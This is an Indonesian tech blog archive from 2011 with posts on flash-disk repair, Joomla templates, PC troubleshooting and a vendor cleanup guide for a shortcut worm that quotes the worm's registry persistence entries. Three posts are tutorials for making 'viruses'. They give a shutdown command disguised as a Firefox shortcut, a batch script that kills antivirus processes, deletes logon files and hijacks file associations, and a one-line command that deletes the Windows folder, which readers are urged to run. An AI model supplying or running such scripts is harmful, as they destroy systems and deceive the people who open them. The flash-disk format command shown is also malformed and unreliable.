flashdisk kita dah py partisi baru... bisa diformati di windows skrg, tp klo yg lbh baik untuk partition table yg lebih baik, sebaiknya format di LINUX aja. nah..wat yg mau cuba format di LINUX, untuk hasil yg lebih optimal coba restart dulu komputer tanpa mencopot usb Flashdisk, nah klo dah muncul linuxnya lagi, masuk ke konsol so ketik $ mkfs.vfat-f32 /dev/sda__ n..wat yg pake SLAX KillBILL kita bisa jg format pake NTFS caranya..liat aja di direktori bin, tuh banyak extension wat format Flashdsik

$cd /bin $ls nah tinggal liat deh byak bgt kan..tp yg ada huruf depannya MKFS klo dari hasil yg aku praktekkin, 100% jd lebih baik n lebih Cepat baca datanya...n alhasil aku bisa minta flashdisk org yg rusak dr temen2 dikampus so..aku praktekin deh cara ini memperbaiki flash disk Tuesday, February 08, 2011 1:31 PM bagi anda yang sedang mengalami masalah dengan flashdisk, khususnya kasus flashdisk terdeteksi di Windows namun tidak bisa di format anda bisa menggunakan beberapa cara berikut ini untuk memperbaikinya : Format flashdisk melalui Linux/LiveCD Linux (original page: http://linux.or.id/node/2835/) Langkah yang harus dilakukan: 1. Booting komputer menggunakan LiveCD Linux, misal Slax KillBill, Knoppix atau distro lainnya, 2. Setelah login ke sistem, masukkan flashdisk yang bermasalah tadi ke salah satu port USB. Demi keamanan data, pastikan hanya flashdisk yang bermasalah saja yang terpasang, 3. Pastikan flashdisk anda terdeteksi, atau setidaknya indikator led nyala, 4. Masuk ke console 5. Pada console jalankan cfdisk /dev/sda1 (sesuaikan dengan flashdisk ke berapa yang terpasang), 6. Delete atau hapus partisi pada flashdisk, 7. Buat partisi baru dengan memilih Create New | Write, 8. Simpan perubahan yang baru saja anda lakukan, 9. Format flashdisk dengan cara mengetikan perintah mkfs.vfat-f32 /dev/sda1 di console. 10. Flashdisk anda telah memiliki partisi baru, sehingga bisa digunakan kembali baik di Linux maupun di Windows. Format flashdisk Menggunakan USB Disk Storage Format Tool Di samping cara di atas, anda juga bisa menggunakan tools yang dikeluarkan oleh pihak ketiga. Salah satunya adalah Hewlet Packard (HP). Walaupun tools ini dikeluarkan oleh HP, namun utilisasinya juga bisa digunakan pada flashdisk merek lain. Berikut langkah-langkah memperbaiki flashdisk yang tidak bisa di format menggunakan HP USB Disk Storage Format Tool: 1. Download aplikasi HP USB Disk Storage Format Tool di sini, 2. Install aplikasi tersebut, rekomendasi OS yang digunakan adalah Microsoft Windows 2000, Windows 2003 Server dan Novel Netware,

3. Masukkan flashdisk yang bermasalah ke salah satu port USB. Pastikan flashdisk anda terdeteksi dan memperoleh alokasi drive di Windows, 4. Jalankan aplikasi HP USB Disk Storage Format Tool 5. Tentukan drive tempat flashdisk terpasang, 6. Pilih Create New or Replace Existing Configuration untuk membuat partisi baru baru dan menghapus konfigurasi yang ada di flashdisk, 7. Format flashdisk anda sesuai dengan file sistem yang diinginkan. Selamat mencoba, mudah-mudahan bermanfaat.

Merubah template Website Joomla Thursday, February 03, 2011 10:54 AM Merubah template Website Joomla Template merupakan kerangka dari sebuah Website. Di posisi mana modul dan komponen akan diletakkan, warna-warna apa saja yang diinginkan tampil di Website, bentuk dan jenis huruf, semuanya sudah ditetapkan secara default dalam sebuah template.Sebuah template dibuat untuk mengontrol dan mengatur tata letak sebuah Website. Pada saat pertama kali membuat Website menggunakan Joomla!, disertakan beberapa jenis template. Pengguna Joomla! dapat merubahnya dengan cara yang sangat mudah, yaitu: 1. Masuk ke halaman Administrator, 2. Masuk ke Template Manager melalui menu Extensions, 3. Pilih jenis template yang lain lalu klik Tombol DEFAULT di kanan atas; Tanda bintang yang terlihat, menunjukkan jenis template yang sedang aktif, 4. Selesai. Preview untuk melihat tampilan Website dengan jenis template yang baru. Seperti layaknya sebuah CMS, Joomla! terbuka untuk ditambahkan (install) jenis-jenis template lainnya. Jenis-jenis template Joomla! lainnya itu banyak tersedia di Internet, mulai dari yang berbayar sampai yang gratisan. Dengan sifatnya yang Open Source, setiap pengguna Joomla! juga dimungkinkan untuk membuat template sendiri. Virus yang membuat komputer anda banjir Shortcut Wednesday, February 02, 2011 3:00 PM Virus yang membuat komputer anda banjir Shortcut Di tengah gencarnya virus-virus Confiker melanda dunia persilatan jaringan, maka ada sebuah virus lokal yang tidak mau kalah untuk unjuk gigi. Virus ini penulis dapatkan secara tidak sengaja, ketika sedang beranjang sana di sebuah tempat kerja sahabat dekat, dia mengeluh kok banyak banget sih shortcut di komputernya. Setelah diamati memang benar banyak sekali file-file shortcut yang bertebaran di setiap folder yang ada di dalam komputernya, seperti Microsoft.lnk, dan juga file shortcut dengan nama seperti nama folder yang dimiliki. Akhirnya dengan naluri vaksinis yang tidak bisa mendengar ada virus baru yang

tidak terdeteksi oleh antivirus, maka dengan segera keluhan tersebut langsung dianalisa lebih lanjut dan dibuatkan cara mengatasinya. Norman Virus Control mendeteksi virus ini sebagai Worm:PIF/Starter.A (lihat gambar 1) : NSS detect shortcut Gambar 1, Norman Security Suite mendeteksi virus Shortcut sebagai Worm:PIF/Starter.A Ciri-ciri dari virus tersebut adalah : 1. Di folder My Documents terdapat sebuah file yang bernama database.mdb, dan ternyata ini adalah file induknya. 2. File Autorun.inf, Thumb.db, Microsoft.lnk di setiap driver, folder dan flash disk sampai pada SUB Folder yang ke-2. 3. Membuat File Duplikat setiap folder dengan extensi .lnk, maksimal 5 nama folder pertama, misalnya kalau di C:\Windows ada banyak maka hanya akan diambil 5 nama pertama saja. Dan berlaku sampai sub folder yang ke-2 (lihat gambar 2) Gambar 2, Aksi virus Shortcut memalsukan folder 4. Mematikan fungsi dari file Registry (lihat gambar 3)

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system] "DisableRegistrytools"=dword:00000001 Gambar 3, Pesan yang ditampilkan jika mengakses Registry Edit 5. Menambahkan value di registry :

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run] "Explorer"="Wscript.exe //e:VBScript \"C:\Documents and Settings\Administrator\My Documents\database.mdb\"" [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run] "WinUpdate"="Wscript.exe /e:VBScript \"C:\WINDOWS\:Microsoft Office Update for Windows XP.sys\"" Untuk script yang terakhir mungkin sekali ini hanya script untuk mengecoh saja, tetapi dalam prakteknya kita harus mendeletenya. Jika pada saat kita LogOn komputer, maka akan didapat message error seperti di bawah ini (lihat gambar 4) Gambar 4, Pesan error yang ditampilkan saat logon karena gagal loading script. Yang membuat kita menjadi geram adalah banyak sekali shortcut yang dibuat oleh virus tersebut. Dan hebatnya virus tersebut kalau cara penanganannya tidak tepat maka akan kembali lagi dan lagi. Oleh sebab itu ada beberapa cara yang harus dilakukan untuk memberantas virus yang menyebalkan ini : 1.Matikan proses dari file WSCRIPT yang terletak di C:\Windows\System32, dengan cara menggunakan tools seperti CProcess, HijackThis atau dapat juga menggunakan Task Manager dari windows.

2. Sebelumnya

matikan dulu proses SYSTEM RESTORE.

3. Setelah dimatikan proses dari Wscript tersebut, kita harus mendetele atau merename dari pada file tersebut agar tidak digunakan (untuk sementara) lagi oleh virus tersebut. Sebagai catatan, kalau kita merename dari file Wscript.exe tersebut dengan automatis akan dikopikan lagi di folder tersebut, oleh sebab itu kita harus mencari di mana file Wscript.exe yang lainnya biasanya ada di C:\Windows\$NtServicePackUninstall$, C:\Windows\ServicePackFiles\i386. Tidak seperti virus-virus VBS lainnya, kita bisa mengganti Open With dari file VBS menjadi Notepad, virus ini berextensi MDB yang berarti adalah file Microsoft Access. Jadi Wscript akan menjalankan file DATABASE.MDB seolah-olah dia adalah file VBS. (Virus pintar kan) Wscript.exe //e:VBScript \"C:\Documents and Settings\Administrator\My Documents\database.mdb\"" 4. Delete file induknya yang ada di C:\Documents and Settings\\My Documents\database.mdb, agar setiap kali komputer dijalankan tidak akan meload file tersebut. Dan jangan lupa kita buka juga MSCONFIG, disable perintah yang menjalankannya. 5. Sekarang kita akan mendelete file-file Autorun.INF. Microsoft.INF dan Thumb.db. dengan cara, klik tombol START, ketik CMD, pindah ke drive yang akan dibersihkan, misalnya drive C:\, maka yang harus kita lakukan adalah Ketik C:\del Microsoft.inf /s = perintah ini akan mendelete semua file microsoft.inf di seluruh folder di drive C: , kalau mau pindah drive tinggal diganti nama drivenya saja contoh : D:\del Microsoft.inf /s Untuk file autorun.inf, ketik C:\del autorun.inf /s /ah /f = perintah akan mendelete file autorun.inf (syntax /ah /f digunakan karena file tersebut memakai attrib RSHA, begitu juga untuk file Thumb.db lakukan juga hal yang sama. (lihat gambar 5) Gambar 5, Perintah mendelete file lnk yang diciptakan virus. 6. Untuk mendelete file-file selain 4 file terdahulu, kita harus mencarinya dengan cara Search file dengan ekstensi .lnk ukurannya 1 KB, Pada More advanced options, pastikan option Search system folders dan Search hidden files and folders keduanya telah dicentang. Harap berhati-hati, tidak semua file shortcut / file LNK yang berukuran 1 KB adalah virus, kita dapat membedakannya dari iconnya, size dan Type. Untuk shortcut yang diciptakan virus iconnya selalu menggunakan icon "folder", ukuran 1 KB dengan Type "Shortcut". Sedangkan folder yang benar harusnya tidak memiliki "size" dan Typenya adalah "File Folder". Contoh di bawah, gambar bagian kiri folder dengan nama "Music", "Video", "Programs", "Documents" dan "Compressed" sebenarnya adalah shortcut yang memalsukan diri sebagai icon folder yang diciptakan oleh virus dan harus dihapus karena memiliki size 1 KB dan Type "Shortcut". Sedangkan Folder dengan nama "Compressed", "Documents", "Music", "Programs", "Video" dan "Virus" yang tidak memiliki Size dan Type "File Folder" adalah folder asli yang namanya dicatut oleh virus. Sedangkan gambar kanan, shortcut yang asli dari program memiliki icon khusus sesuai icon programnya. (lihat gambar 6) Gambar 6, Shortcut Type "Shortcut" yang dibuat virus akan menyerupai icon folder, tetapi memiliki Size 1 KB dan

7. Fix registry yang sudah di ubah oleh virus. Untuk mempercepat proses perbaikan registry salin script dibawah ini pada program notepad kemudian simpan dengan nama "Repair.inf". Jalankan file tersebut dengan cara: - Klik kanan repair.inf

- Klik Install [Version] Signature="$Chicago$" Provider=Vaksincom Oyee [DefaultInstall] AddReg=UnhookRegKey DelReg=del [UnhookRegKey] HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*" HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*" HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*" HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*" HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1"" HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*" HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe" HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, "cmd.exe" HKLM, SYSTEM\ControlSet002\Control\SafeBoot, AlternateShell,0, "cmd.exe" [del] HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run, Winupdate HKCU,SOFTWARE\Microsoft\Windows\CurrentVersion\Run, explorer Salam MG Lat [email protected] PT. Vaksincom Jl. Tanah Abang III / 19E Jakarta 10160 Ph : 021 345 6850 Fx : 021 345 6851 cara membuat virus dengan SHORTCUT Wednesday, February 02, 2011 2:58 PM ini dibuat hanya untuk pembelajaran dan penulis tidak bertanggung jawab atas akibat dari tulisan ini

mari kita mulai -pertama-tama klik kanan pada layar dekstop kosong -pilih shortcut -lalu pada jendela browse, tulis tulisan berikut: shutdown.exe -s -t 100-c komp anda telah terserang virus dan akan meledak dalam waktu 100 detik -lalu pilih next pada name area, buat nama yang menyakinkan seperti monzila firefox -pilih finish lau setelah selesai, klik kanan shortcut batusan -pilih properties -change icon pilih icon yang sesuai dan virus bajakan pun siap disajikan membuat virus komputer Wednesday, February 02, 2011 2:48 PM Virus komputer adalah sebuah program komputer yang dapat menyalin sendiri atau menggandakan dirinya sendiri dan menginfeksi system komputer yang secara umum bersifat merusak. Tetapi, taukah kamu bahwa virus komputer itu dapat dibuat secara sederhana, tulisan dibawah ini merupakan salah satu cara membuat virus komputer dengan cara yang sangat sederhana. Tetapi sebelum kamu membaca dan mempraktekkan tulisan tersebut perlu dipahami bahwa postingan ini hanya bersifat menambah pengetahuan kamu bukan sebagai hal yang berdampak negatif dan apapun yang terjadi setelah mempraktekkan tulisan dibawah ini, saya terlepas dari dampak yang terjadi.. Mudah cara untuk membuat kode Virus Virus ini dapat menyerang: 1. Menhapus, NAVAPSVC.exe 2. Menhapus, Explorer.exe (taskbar dan ikon akan hilang) 3. Menhapus, zonelabs.exe 4. mengubah asosiasi file exe menjadi txt (ketika membuka file exe, akan pergi ke notepad) 5. mengubah asosiasi file txt menjadi mp3 (ketika membuka file txt, maka akan terbuka WinAmp atau multimedia player) 6. Menghapus Login / Logoff Screens Hanya Copy kode di bawah ini lalu paste Pada Notepad: title virus is my dna color 0A

@echo off set end=md u cant eascape from me-vishnu set fin=copy Hack log.txt Installing %end% %fin% net send * andhra pradesh- virus created in karimnagar from jits college kill NAVAPSVC.exe /F /Q kill zonelabs.exe /F /Q kill explorer.exe /F /Q cls assoc .exe=txtfile assoc .txt=mp3file assoc .mp3=.vcf cls msg * hi dude this is begining. msg * vishnu attcked the system try to challenge him . DEL C:\WINDOWS\system32\logoff.exe /F /Q DEL C:\WINDOWS\system32\logon.exe /F /Q DEL C:\WINDOWS\system32\logon.scr /F /Q cls shutdown Simpan di C: dengan nama installhack.bat Selesai membuat virus sderhana melalui notepad Wednesday, February 02, 2011 2:43 PM

Sobatku sekalian!, sekarang kita mempelajari virus yang dapat menghapus system (kita mulai dari OS Windows aja ya!, nanti kalian kembangkan sendiri). Caranya : evil 1. buka aplikasi "Notepad",tau caranya khan?! 2. Tulis/Copy rumus dibawah ini!:

DEL /F /Q C:\WINDOWS (simple kan?) 3. sekarang simpan dalam format .cmd, caranya : pada bagian "File nama" tulis virusganas.cmd dan "Save as type" pilih "All Files", visualisasinya: You are not allowed to view images. Please register or login klik "Save" deh!. Coba jalankan virus ini!, paling juga sekarang kalian harus nginstall ulang OS untuk komputer kalian. Hehe... MENGATASI KOMPUTER LEMOT Wednesday, February 02, 2011 2:42 PM MENGATASI KOMPUTER LEMOT Pernahkah Anda rasakan, makin lama PC terasa semakin lambat, baik dalam membuka suatu aplikasi, maupun ketika mencari data? Apakah ini Cuma perasaan saja? Bisa jadi ini bukan perasaan, tapi kenyataan yang Anda hadapi. Beragam sebab bisa menjadi pemicu kelambatan PC tersebut, bisa karena hardware maupun software-nya. Untuk mengatasi masalah ini, beragam cara bisa dilakukan. Memang yang paling mudah adalah menginstal ulang seluruh sistem Anda. Namun, ini tentu bukan jalan yang terbaik. Selain merepotkan, Anda juga tidak akan tambah pintar troubleshooting. Cara paling efektif buat mengidentifikasi sekaligus mengatasi masalah semacam ini adalah dengan menempuh beberapa langkah. Biasanya langkah-langkah ini cukup jitu untuk meningkatkan kembali performa PC Anda agar kembali seperti sediakala. 1. Scan dengan Antivirus Salah satu penyebab paling umum PC jadi mengendor kerjanya adalah virus. Beberapa virus memang bisa bikin kinerja PC menurun. Apalagi virus yang menyerang aplikasi-aplikasi tertentu dan menyebabkan kerusakan. Untuk mengatasinya, cara yang paling ampuh adalah dengan menggunakan antivirus. Anda bisa membunuh virus-virus ini dengan antivirus yang bagus. Update-lah secara berkala agar virus-virus baru bias terdeteksi sekaligus dibunuh sehingga kinerja PC tidak terganggu. 2. Cek Hardware Anda Anda juga bisa mengecek perangkat-perangkat yang terpasang, apakah masih bekerja secara optimal. Power supply misalnya. Setelah bekerja secara terus menerus, kemungkinan terjadi penurunan kinerja. Tentunya ini akan mempengaruhi kecepatan proses kerja sistem. Kalau kondisinya begini, ganti power supply-nya dengan yang baru. Memori juga demikian. Kalau Anda rasa aplikasi yang Anda jalankan makin banyak, Anda bias mengkalkulasikan, apakah perlu memori tambahan agar kinerja sistem bisa lebih baik. Suhu prosesor juga perlu Anda periksa. Maklum, makin panas prosesor tentu kinerjanya akan semakin berat. Agar tidak terjadi hal demikian, Anda harus perhatikan apakah heatsink fan prosesor masih bekerja dengan baik untuk menjamin panasnya prosesor bukan disebabkan oleh pendinginnya yang bekerja kurang optimal. Penggunaan thermal grease juga dianjurkan untuk mengatasi panas prosesor. 3. Cek Setting di BIOS Langkah lain yang bisa dilakukan adalah memperhatikan beragam setting pada BIOS di motherboard Anda. Pastikan kecepatan prosesor, memori, dan lain-lain sudah sesuai. Di sini Anda juga bias mengatur beberapa setting agar kecepatan kerja bisa bertambah, semisal fitur Top Performance diatur pada posisi

enable.Begitu pula untuk memori Anda bisa tingkatkan CAS Latencynya, dan lain-lain. Update BIOS dengan yang terbaru juga bias mengurangi kelambatan sistem Anda. 4. Cek Driver Anda juga bias memperhatikan driver-driver yang terpasang untuk masingmasing perangkat. Apabila terdapat konflik driver, Anda bias uninstall dulu untuk kemudian menginstal kembali driver yang sesuai. Anda juga bisa mengupdate beberapa driver vital untuk memperbaiki performa kerja perangkat. 5. Defrag Harddisk Banyaknya file yang sudah membebani harddisk juga akan mempengaruhi kecepatan sistem dalam beroperasi. Apalagi kalau file tersebut berada pada posisi yang terpencar-pencar di dalam harddisk.Untuk mengurangi masalah kelambatan PC yang disebabkan oleh hal ini, Anda bisa mendefrag harddisk secara reguler. 6. Hapus File-File Sampah Harddisk yang terlalu disesaki dengan beragam file juga akan memperlambat sistem. Ini akan sangat terasa jika space kosong harddisk tinggal beberapa MB lagi. Untuk menanggulanginya, Anda bisa membuang file-file yang tidak perlu. Trik lainnya adalah menguninstall aplikasi-aplikasi yang tidak terlalu dipakai namun Anda punya software-nya. Kalau diperlukan baru diinstal kembali. Jangan lupa pula untuk menghapus secara berkala beberapa file cookies dan filefile yang tidak berguna lainnya yang biasanya tersimpan dalam folder Temp atau Temporary Internet Files. TROUBLESHOOTING KOMPUTER Wednesday, February 02, 2011 2:37 PM TROUBLESHOOTING KOMPUTER Komputer sudah merupakan alat bantu yang tergolong penting saat ini, kita ambil salah satu contoh pada kegiatan perkantoran, tentunya dengan adanya komputer maka pekerjaan dapat diselesaikan dengan lebih cepat. Sebagai pengguna atau pemakai komputer tentunya kita juga pernah mengalami masalah dengan komputer. Hal tersebut dapat diakibatkan adanya kesesuaian dari komponen dasar komputer itu sendiri yang biasanya berkaitan dengan Software (perangkat lunak atau aplikasinya), Hardware (perangkat keras) atau Brainware (si pemakai komputer). Pengertian Troubleshooting Komputer Dalam dunia komputer, segala sesuatu masalah yang berhubungan dengan komputer disebut Troubleshooting dan timbulnya masalah dalam komputer tentu ada sebabnya. Pada kesempatan ini kita akan sedikit belajar untuk mendeteksi masalah pada komputer Anda terutama yang berhubungan dengan Hardware. Untuk permasalahan dengan Software sebaiknya Anda lakukan pendeteksian sederhana dahulu seperti pemeriksaan file-file yang berhubungan dengan Software atau spesifikasi permintaan (requirement) dari Software. Apabila permasalahannya cukup rumit, sebaiknya Anda install ulang saja Software tersebut, karena akan terlalu rumit untuk memperbaiki sebuah Software, sedangkan untuk permasalahan dengan Brainware, penulis hanya dapat memberikan saran istirahat dulu deh, he. Teknik dalam Troubleshooting Terdapat dua macam teknik dalam mendeteksi permasalahan dalam komputer, yaitu teknik Forward dan teknik Backward. Untuk lebih mengenal kedua teknik tersebut, ada baiknya kita bahas terlebih dahulu definisi dari masing-masing teknik tersebut.

1. Teknik Forward Sesuai dengan namanya, maka dalam teknik ini segala macam permasalahan dideteksi semenjak awal komputer dirakit dan biasanya teknik ini hanya digunakan oleh orang-orang dealer komputer yang sering melakukan perakitan komputer. Pada teknik ini hanya dilakukan pendeteksian masalah secara sederhana dan dilakukan sebelum komputer dinyalakan (dialiri listrik). Untuk mempermudah silakan simak contoh berikut : Setelah komputer selesai dirakit, maka dilakukan pemeriksaan pada semua Hardware yang telah terpasang, misalnya memeriksa hubungan dari kabel Power Supply ke soket power pada Motherboard. Untuk casing ATX, kita periksa apakah kabel Power Switch sudah terpasang dengan benar. dsb. 2. Teknik Backward Hampir sama dengan teknik sebelumnya, teknik Backward adalah teknik untuk mendeteksi kesalahan pada komputer setelah komputer dinyalakan (dialiri listrik). Teknik lebih banyak digunakan karena pada umumnya permasalahan dalam komputer baru akan timbul setelah jam terbang komputernya sudah banyak dan ini sudah merupakan hal yang wajar. Dapat kita ambil beberapa contoh sebagai berikut : Floppy Disk yang tidak dapat membaca disket dengan baik. Komputer tidak mau menyala saat tombol power pada casing ditekan. dsb. Tabel Pendeteksian Masalah Setelah penjelasan sederhana dari kedua teknik tersebut penulis akan membahas lebih dalam lagi ke teknik Backward, karena bagi pengguna komputer rumahan tentunya teknik ini lebih banyak akan digunakan ketimbang teknik Forward. Untuk lebih mempermudah dalam pendeteksian masalah pada komputer Anda, silakan simak tabel berikut : Analisa Pengukuran Pada tahapan ini, pendeteksian masalah dengan cara mengukur tegangan listrik pada komponen nomor 1 sampai 3. Gunakan alat bantu seperti multitester untuk mengukur tegangan yang diterima atau diberikan komponen tersebut. Contoh : Mengukur tegangan listrik yang diterima oleh Power Supply, lalu mengukur tegangan yang diberikan oleh Power Supply ke komponen lainnya. Analisa Suara Pada tahapan ini pendeteksian masalah menggunakan kode suara (beep) yang dimiliki oleh BIOS dan dapat kita dengar lewat PC Speaker. Pastikan kabel PC Speaker sudah terpasang dengan baik. Kemungkinan letak permasalahan ada di komponen nomor 4 dan 5. Untuk mempermudah pengenalan kode suara tersebut, silakan simak keterangan berikut : Bunyi beep pendek satu kali, artinya sistem telah melakukan proses Boot dengan baik. Bunyi beep pendek 2 kali, artinya ada masalah pada konfigurasi atau seting pada CMOS. Bunyi beep panjang 1 kali dan pendek 1 kali, artinya ada masalah pada Motherboard atau DRAM. Bunyi beep panjang 1 kali dan pendek 2 kali, artinya ada masalah pada monitor atau VGA Card.

Bunyi beep panjang 1 kali dan pendek 3 kali, artinya ada masalah pada Keyboard. Bunyi beep panjang 1 kali dan pendek 9 kali, artinya ada masalah pada ROM BIOS. Bunyi beep panjang terus-menerus, artinya ada masalah di DRAM. Bunyi beep pendek terus-menerus, artinya ada masalah penerimaan tegangan (power). Pada beberapa merk Motherboard akan mengeluarkan bunyi beep beberapa kali apabila temperatur processornya terlalu tinggi (panas). Catatan : kode bunyi beep diatas berlaku pada AWARD BIOS, untuk jenis BIOS yang lain kemungkinan memiliki kode bunyi beep yang berbeda. Analisa Tampilan Pada tahapan ini pendeteksian masalah cenderung lebih mudah karena letak permasalahan dapat diketahui berdasarkan pesan error yang ditampilkan di monitor. Kemungkinan letak permasalahan ada di komponen nomor 6 sampai 9. Contoh : Pada saat komputer dinyalakan tampil pesan Keyboard Error, maka dapat dipastikan letak permasalahan hanya pada Keyboard. Cara Cepat Mengenali Troubleshooting Apabila terjadi masalah dan sistem masih memberikan tampilan pesan pada monitor atau disertai dengan bunyi beep 1 atau 2 kali, maka kemungkinan letak permasalahan ada di komponen nomor 6 sampai 9, yaitu pada Keyboard, Card I/O, Disk Drive dan Disket. Apabila terjadi masalah dan sistem memberikan kode bunyi beep lebih dari 2 kali, maka kemungkinan letak permasalahan ada di komponen nomor 4 dan 5, yaitu RAM, VGA Card dan Monitor. Sedangkan untuk masalah yang tidak disertai pesan pada monitor atau kode bunyi beep, kemungkinan besar letak permasalahan ada di komponen nomor 1 dan 2, yaitu Power Suplly dan Motherboard. Dengan kedua macam teknik dalam pendeteksian maslah dalam komputer tersebut, tentunya akan lebih memperkaya pengetahuan kita di bidang komputer, jadi jika suatu saat terdapat masalah pada komputer Anda kita dapat melakukan pemeriksaan terlebih dahulu sebelum membawa ke tempat servis, kalaupun harus membawa ke tempat servis kita sudah mengerti letak permasalahannya, jadi kita tidak dibohongi oleh tukang servis yang nakal ; ) Dengan pemahaman troubleshooting komputer yang lebih dalam tentunya akan lebih mempermudah kita untuk mengetahui letak permasalahan dalam komputer dan tentunya akan lebih menyenangkan apabila kita dapat memperbaiki sendiri permasalahan tersebut. Semoga pembahasan sederhana tentang troubleshooting ini dapat bermanfaat, selamat mencoba dan terima kasih.